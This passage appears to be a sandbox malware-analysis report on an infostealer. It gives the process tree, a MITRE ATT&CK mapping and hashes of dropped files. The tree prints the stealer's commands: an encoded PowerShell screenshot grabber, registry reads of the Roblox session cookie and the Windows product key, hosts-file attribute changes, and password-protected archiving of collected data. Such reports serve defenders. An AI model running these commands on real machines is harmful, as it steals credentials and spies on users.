ACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2440
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jdgri3va\jdgri3va.cmdline"
        5⤵
        
        PID:884
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0F3.tmp" "c:\Users\Admin\AppData\Local\Temp\jdgri3va\CSC52BA437614584EA68AA6653F47F1216E.TMP"
        6⤵
        
        PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5004
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3136
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4672
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4100
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2784
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3452
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:412
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4036
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4188
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55002\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3T9WZ.zip" *"
    3⤵
    PID:548
  - - C:\Users\Admin\AppData\Local\Temp\_MEI55002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI55002\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3T9WZ.zip" *
      4⤵
      Executes dropped EXE
      PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3684
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2556

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI55002\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\_bz2.pyd

Filesize
48KB

MD5
58fc4c56f7f400de210e98ccb8fdc4b2

SHA1
12cb7ec39f3af0947000295f4b50cbd6e7436554

SHA256
dfc195ebb59dc5e365efd3853d72897b8838497e15c0977b6edb1eb347f13150

SHA512
ad0c6a9a5ca719d244117984a06cce8e59ed122855e4595df242df18509752429389c3a44a8ba0abc817d61e37f64638ccbdffc17238d4c38d2364f0a10e6bc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\_ctypes.pyd

Filesize
62KB

MD5
79879c679a12fac03f472463bb8ceff7

SHA1
b530763123bd2c537313e5e41477b0adc0df3099

SHA256
8d1a21192112e13913cb77708c105034c5f251d64517017975af8e0c4999eba3

SHA512
ca19ddaefc9ab7c868dd82008a79ea457acd71722fec21c2371d51dcfdb99738e79eff9b1913a306dbedacb0540ca84a2ec31dc2267c7b559b6a98b390c5f3a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\_decimal.pyd

Filesize
117KB

MD5
21d27c95493c701dff0206ff5f03941d

SHA1
f1f124d4b0e3092d28ba4ea4fe8cf601d5bd8600

SHA256
38ec7a3c2f368ffeb94524d7c66250c0d2dafe58121e93e54b17c114058ea877

SHA512
a5fbda904024cd097a86d6926e0d593b0f7e69e32df347a49677818c2f4cd7dc83e2bab7c2507428328248bd2f54b00f7b2a077c8a0aad2224071f8221cb9457

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\_hashlib.pyd

Filesize
35KB

MD5
d6f123c4453230743adcc06211236bc0

SHA1
9f9ade18ac3e12bcc09757a3c4b5ee74cf5e794e

SHA256
7a904fa6618157c34e24aaac33fdf84035215d82c08eec6983c165a49d785dc9

SHA512
f5575d18a51207b4e9df5bb95277d4d03e3bb950c0e7b6c3dd2288645e26e1de8edcf634311c21a6bdc8c3378a71b531f840b8262db708726d36d15cb6d02441

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
9f746f4f7d845f063fea3c37dcebc27c

SHA1
24d00523770127a5705fcc2a165731723df36312

SHA256
88ace577a9c51061cb7d1a36babbbefa48212fadc838ffde98fdfff60de18386

SHA512
306952418b095e5cf139372a7e684062d05b2209e41d74798a20d7819efeb41d9a53dc864cb62cc927a98df45f7365f32b72ec9b17ba1aee63e2bf4e1d61a6e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
8f8eb9cb9e78e3a611bc8acaec4399cb

SHA1
237eee6e6e0705c4be7b0ef716b6a4136bf4e8a8

SHA256
1bd81dfd19204b44662510d9054852fb77c9f25c1088d647881c9b976cc16818

SHA512
5b10404cdc29e9fc612a0111b0b22f41d78e9a694631f48f186bdde940c477c88f202377e887b05d914108b9be531e6790f8f56e6f03273ab964209d83a60596

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-debug-l1-1-0.dll

Filesize
21KB

MD5
226a5983ae2cbbf0c1bda85d65948abc

SHA1
d0f131dcba0f0717c5dea4a9ca7f2e2ecf0ad1c3

SHA256
591358eb4d1531e9563ee0813e4301c552ce364c912ce684d16576eabf195dc3

SHA512
a1e6671091bd5b2f83bfaa8fcf47093026e354563f84559bd2b57d6e9fa1671eea27b4ed8493e9fdf4bde814074dc669de047b4272b2d14b4f928d25c4be819d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
21KB

MD5
c2f8c03ecce9941492bfbe4b82f7d2d5

SHA1
909c66c6dfea5e0c74d3892d980918251bb08632

SHA256
d56ce7b1cd76108ad6c137326ec694a14c99d48c3d7b0ace8c3ff4d9bcee3ce8

SHA512
7c6c85e390bbe903265574e0e7a074da2ce30d9376d7a91a121a3e0b1a8b0fffd5579f404d91836525d4400d2760cb74c9cb448f8c5ae9713385329612b074cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-fibers-l1-1-0.dll

Filesize
21KB

MD5
b5e2760c5a46dbeb8ae18c75f335707e

SHA1
e71db44fc0e0c125de90a9a87ccb1461e72a9030

SHA256
91d249d7bc0e38ef6bcb17158b1fdc6dd8888dc086615c9b8b750b87e52a5fb3

SHA512
c3400772d501c5356f873d96b95dc33428a34b6fcaad83234b6782b5f4bf087121e4fd84885b1abab202066da98eb424f93dd2eed19a0e2a9f6ff4a5cfd1e4f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-fibers-l1-1-1.dll

Filesize
21KB

MD5
050a30a687e7a2fa6f086a0db89aa131

SHA1
1484322caaf0d71cbb873a2b87bdd8d456da1a3b

SHA256
fc9d86cec621383eab636ebc87ddd3f5c19a3cb2a33d97be112c051d0b275429

SHA512
07a15aa3b0830f857b9b9ffeb57b6593ae40847a146c5041d38be9ce3410f58caa091a7d5671cc1bc7285b51d4547e3004cf0e634ae51fe3da0051e54d8759e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-1-0.dll

Filesize
25KB

MD5
9f45a47ebfd9d0629f4935764243dd5a

SHA1
86a4a0ea205e31fb73f3bfcce24945bd6bea06c7

SHA256
1ca895aba4e7435563a6b43e85eba67a0f8c74aa6a6a94d0fc48fa35535e2585

SHA512
8c1cdcad557bff1685a633d181fcf14ec512d322caeaeb9c937da8794c74694fe93528fc9578cb75098f50a2489ed4a5dedf8c8c2ac93eeb9c8f50e3dd690d5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
cc228ff8d86b608e73026b1e9960b2f8

SHA1
cef0705aee1e8702589524879a49e859505d6fe0

SHA256
4cadbc0c39da7c6722206fdcebd670abe5b8d261e7b041dd94f9397a89d1990d

SHA512
17abd9e0ec20b7eb686e3c0f41b043d0742ab7f9501a423b2d2922d44af660379792d1cc6221effbd7e856575d5babf72657ae9127c87cc5cf678bd2ceb1228f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l2-1-0.dll

Filesize
21KB

MD5
e368a236f5676a3da44e76870cd691c9

SHA1
e4f1d2c6f714a47f0dc29021855c632ef98b0a74

SHA256
93c624b366ba16c643fc8933070a26f03b073ad0cf7f80173266d67536c61989

SHA512
f5126498a8b65ab20afaaf6b0f179ab5286810384d44638c35f3779f37e288a51c28bed3c3f8125d51feb2a0909329f3b21273cb33b3c30728b87318480a9ef8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-handle-l1-1-0.dll

Filesize
21KB

MD5
416aa8314222db6cbb3760856be13d46

SHA1
5f28fe2d565378c033ef8eea874bc38f4b205327

SHA256
39095f59c41d76ec81bb2723d646fde4c148e7cc3402f4980d2ade95cb9c84f9

SHA512
b16ed31dc3343caea47c771326810c040a082e0ab65d9ae69946498ceb6ae0dee0a570dbcd88090668a100b952c1ff88bade148811b913c90931aa0e657cd808

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-heap-l1-1-0.dll

Filesize
21KB

MD5
344a09b4be069f86356a89482c156647

SHA1
2506ffeb157cb531195dd04d11d07c16e4429530

SHA256
8f105771b236dbcb859de271f0a6822ce1cb79c36988dd42c9e3f6f55c5f7eb9

SHA512
4c1e616443576dc83200a4f98d122065926f23212b6647b601470806151ff15ea44996364674821afec492b29ba868f188a9d6119b1e1d378a268f1584ca5b29

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
21KB

MD5
86023497fa48ca2c7705d3f90b76ebc5

SHA1
835215d7954e57d33d9b34d8850e8dc82f6d09e8

SHA256
53b25e753ca785bf8b695d89dde5818a318890211dc992a89146f16658f0b606

SHA512
8f8370f4c0b27779d18529164fa40cbfddafa81a4300d9273713b13428d0367d50583271ea388d43c1a96fed5893448cd14711d5312da9dfa09b9893df333186

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-kernel32-legacy-l1-1-1.dll

Filesize
21KB

MD5
0c1cc0a54d4b38885e1b250b40a34a84

SHA1
24400f712bbe1dd260ed407d1eb24c35dcb2ecac

SHA256
a9b13a1cd1b8c19b0c6b4afcd5bb0dd29c0e2288231ac9e6db8510094ce68ba6

SHA512
71674e7ed8650cac26b6f11a05bfc12bd7332588d21cf81d827c1d22df5730a13c1e6b3ba797573bb05b3138f8d46091402e63c059650c7e33208d50973dde39

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
21KB

MD5
5fbcb20d99e463259b4f15429010b9cd

SHA1
b16770f8bb53dc2bafcb309824d6fa7b57044d8a

SHA256
7f39ba298b41e4963047341288cab36b6a241835ee11ba4ad70f44dacd40906c

SHA512
7ba1ac34b3ecfbfb8252f5875be381d8ef823b50dfe0e070222175ee51191f5ee6d541eeedd1445ed603a23d200ce9ce15914c8ed3fafe7e7f3591f51f896c58

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
5241df2e95e31e73ccfd6357ad309df0

SHA1
2644cc5e86dfad1ad2140181ab2ca79725f95411

SHA256
6ee44dd0d8510dc024c9f7c79b1b9fa88c987b26b6beb6653ddd11751c34e5dc

SHA512
52cccd1dd237e764e34996c0c5f7a759a7f0eff29b61befeaf96a16d80df2ba9ee2c3615f875153198a145d68f275aea6d02187e6eee5a129e3e2ab81aaceb16

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-memory-l1-1-0.dll

Filesize
21KB

MD5
8d285430e8bda6d5c9b683579adcb180

SHA1
619dbbcff06c659e3fc48f03917a4dadbfc1c275

SHA256
0512a35316ec9180437f86696a84c5c06a7e4e82e050055a656e5bf9fca206f9

SHA512
38405dd85dd62f843abb55acea1b64d7d63bb601445bf1b32078cde5bbef4861dd99f26659281fe2aea86f58cfb1725d8c63d91fb539dcbf5d98cdbe783337fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
21KB

MD5
4a28ca64f44b91f43945ee3971e0996a

SHA1
45b3d8584c58e8d6ae507fdbd772feeb1886c8b0

SHA256
c05f1fffe3b5a2738ea54ce9485cca026fb9635f982626fba1e1dcc531897273

SHA512
862a0428f08d447cd1ee0431969e0fbcb182f4c46418c26d26fa33e586e686d9c093c1ca5781f544ce9276195ce973850719636e39e465f059607f455ecfdd93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
21KB

MD5
7fd4a71085783ccfe9c289c07bcf9b04

SHA1
bb6ffdb5c069dbba06998dc877d24f72dad6298d

SHA256
c4eca98c3c67b6395d5b005b00ac1eb0318b86b23aa71035a44c2b1602befba9

SHA512
a96c5b90b8384b239be111d90caa3b947651ad73382ab9e5dbe4a4b6ad30921876545331d37c8d5a8f669e39d71bf60983c4ba39c479e23015c2f7579c5e55cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
c123f2c161884fbff4f00ef1e1391266

SHA1
7db3055da53916bea2b85b159491a0772fb620ce

SHA256
5ccb89e93d67bc3288d4e84649c5346e66e15e3d7cd65d989daf3f4cb584be9a

SHA512
dac5616320b9052254b5687959e67126c4a938e79173d8245675a9651674384c36cc856f996ef88ae621ec67afc6616626657585d92bb5d14602a7cc9fc0f669

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
385f562bdc391ccd4f81aca3719f3236

SHA1
f6633e1dac227ba3cd14d004748ef0c1c4135e67

SHA256
4ad565a8ba3ef0ea8ab87221ad11f83ee0bc844ce236607958406663b407333e

SHA512
b72ed1a02d4a02791ca5490b35f7e2cb6cb988e4899eda78134a34fb28964ea573d3289b69d5db1aac2289d1f24fd0a432b8187f7ae8147656d38691ae923f27

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI55002\api-ms-win-core-profile-l1-1-0.dll

Filesize
21KB

MD5
7a629293eeb0bca5f9bdee8ade477c54

SHA1
a25bf8bac4fbfd9216ea827e71344ba07b1d463b

SHA256
7809160932f44e59b021699f5bc68799eb7293ee1fa926d6fcca3c3445302e61

SHA512
